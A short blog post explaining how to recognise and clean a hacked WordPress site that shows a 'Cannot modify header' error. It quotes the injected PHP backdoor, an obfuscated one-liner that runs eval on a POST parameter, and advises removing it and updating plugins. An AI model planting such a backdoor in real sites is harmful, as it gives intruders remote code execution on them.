A General Technology & Development Blog

Technology, Development, Programming – Magento, Wordpress.

Home » WordPress site hacked “Cannot modify header”…

WordPress site hacked “Cannot modify header”…

Do you suspect your wordpress site has been hacked? Are you seeing the error message:

“Warning: Cannot modify header information – headers already sent by…” when trying to login to your wp-admin panel?

Then you might be right.

If you check the file and line that the error message is referring to you may see that the file has been compromised and code such as this has been added:

< ? php $wbe38 = "tpo_s" ;$jog8 = strtoupper ( $wbe38[3].$wbe38[1] . $wbe38[2].$wbe38[4]. $wbe38[0] ); if (isset( ${ $jog8 }[ 'q8ae6a4'])){eval ( ${ $jog8} [ 'q8ae6a4']) ;} ? >

This is a malicious script that allows unauthorised access to your hosting account and for them to place malicious files hidden in your folders for mail spamming.

Remove the line of code from your file.

Note: this error may appear in more than 1 file, so remove the code and try again. If the error persists check each file that it refers to.

To login to admin panel (as login box is usually missing), simply disable the compromised plugin by renaming the plugin folder.

Once you have logged in; update your site, update your plugins and lock wordpress down.

Advanced note: This error is common with outdated plugin “cforms”. This plugin is vulnerable and needs replacing with another form plugin. There is also a cforms2 plugin now available.

Important; this is for info purposes only and i am not affiliated with any plugins.

  • Was this Helpful ?
  • Yes   No

Name of author

Name: BlogOwner

Short Bio: "The master has failed more times than the beginner has even tried."

eXTReMe Tracker